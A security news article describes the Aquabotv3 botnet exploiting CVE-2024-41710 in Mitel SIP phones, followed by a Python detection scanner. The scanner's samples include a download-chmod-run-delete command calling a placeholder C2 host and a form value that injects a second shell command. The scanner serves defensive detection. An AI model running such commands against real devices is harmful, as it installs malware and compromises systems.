New Aquabotv3 Botnet Malware Exploits Mitel Command Injection Vulnerability
January 30, 2025
Akamai's Security Intelligence and Response Team (SIRT) has identified a new variant of the Mirai-based botnet malware Aquabot, known as Aquabotv3, which is exploiting CVE-2024-41710, a command injection vulnerability in Mitel SIP phones. This is the third version of Aquabot that Akamai SIRT has tracked since the malware family was introduced in 2023. The latest variant has a unique feature that detects termination signals and communicates this information to its command-and-control (C2) server, a mechanism not commonly seen in botnets.
The vulnerability, CVE-2024-41710, affects Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, commonly used across various sectors, including corporate offices, enterprises, government agencies, hospitals, educational institutes, hotels, and financial institutions. It is a medium-severity flaw that enables an authenticated attacker with administrative privileges to conduct an argument injection attack due to insufficient parameter sanitization during the boot process, leading to arbitrary command execution. Mitel issued fixes and a security advisory about this flaw on July 17, 2024, urging users to upgrade their systems.
Two weeks after Mitel's advisory, security researcher Kyle Burns published a proof-of-concept (PoC) on GitHub. Aquabotv3's use of this PoC to attack CVE-2024-41710 is the first documented case of the vulnerability being exploited. 'Akamai SIRT detected exploit attempts targeting this vulnerability through our global network of honeypots in early January 2025 using a payload almost identical to the PoC,' the researchers reported.
Because the attack requires authentication, the botnet most likely brute-forces credentials to gain initial access. The attackers send an HTTP POST request to the vulnerable endpoint 8021xsupport.html, which manages the 802.1x authentication settings on Mitel SIP phones. The application fails to sanitize user input, allowing malformed data to be written into the phone's local configuration. When the configuration file is parsed at boot, the injected data causes the device to fetch and execute a shell script from the attackers' server; that script downloads the Aquabot payload, sets its execution permissions, runs it, and then removes any traces.
Once established, Aquabotv3 connects to its C2 over TCP to receive instructions, attack commands, updates, or additional payloads. It then attempts to spread to other IoT devices using multiple vulnerabilities, including CVE-2018-17532, CVE-2023-26801, CVE-2022-31137, and CVE-2018-10562 / CVE-2018-10561. The malware also tries to brute-force default or weak SSH/Telnet credentials to reach poorly secured devices on the same network. Aquabotv3's primary objective is to add devices to its distributed denial-of-service (DDoS) swarm and use them to carry out various types of attacks. The botnet's operator advertises its DDoS capabilities on Telegram under various names, presenting it as a testing tool for DDoS mitigation measures.
Akamai has provided a list of the indicators of compromise (IoC) associated with Aquabotv3, as well as Snort and YARA rules for detecting the malware, in its report.
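As an added illustration of the two behaviours described above, the injection attempt against the 802.1x settings page and the download-chmod-run-delete chain on the device, here is a small detection scanner written for this article; it is not Akamai's Snort or YARA rules, and the simplified log format, field names and C2 host in the samples are constructed assumptions, not indicators from the report.

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Endpoint named in the report as the target of the CVE-2024-41710 POST request.
TARGET_PATH = "/8021xsupport.html"
# Shell metacharacters that have no business in an 802.1x identity or password field.
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
# The post-exploitation sequence the report describes: fetch, make executable, clean up.
DROPPER_CHAIN = re.compile(r"\b(wget|curl|tftp)\b.*\bchmod\b.*\brm\b", re.S)

@dataclass
class Finding:
    line_no: int
    reason: str

def scan_http(lines):
    """Flag POSTs to the 802.1x settings page whose form fields carry shell metacharacters.
    Input lines use a constructed 'METHOD PATH|urlencoded-body' format, not a real device log."""
    findings = []
    for n, line in enumerate(lines, 1):
        head, _, body = line.partition("|")
        method, _, path = head.partition(" ")
        if method != "POST" or path.split("?", 1)[0] != TARGET_PATH:
            continue
        for name, values in parse_qs(body, keep_blank_values=True).items():
            if any(SHELL_META.search(v) for v in values):
                findings.append(Finding(n, f"shell metacharacter in field {name!r}"))
    return findings

def scan_shell(lines):
    """Flag command lines that download, chmod and delete in a single invocation."""
    return [Finding(n, "dropper chain: download, chmod and rm in one command line")
            for n, line in enumerate(lines, 1) if DROPPER_CHAIN.search(line)]

# Constructed samples; 'C2-PLACEHOLDER' stands in for a real host and is not an IoC.
HTTP_SAMPLES = [
    "GET /8021xsupport.html|",
    "POST /8021xsupport.html|mode=1&identity=phone01&password=secret",
    "POST /8021xsupport.html|mode=1&identity=phone01%3Bid&password=secret",
    "POST /login.html|user=admin%3Bid",
]
SHELL_SAMPLES = [
    "ls -la /tmp",
    "wget http://C2-PLACEHOLDER/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x; rm -f /tmp/x",
]

if __name__ == "__main__":
    for f in scan_http(HTTP_SAMPLES) + scan_shell(SHELL_SAMPLES):
        print(f"line {f.line_no}: {f.reason}")
```

The HTTP check only fires on the targeted path, so a metacharacter in an unrelated form (the fourth sample) is ignored; widen `TARGET_PATH` to a set if other configuration pages should be covered.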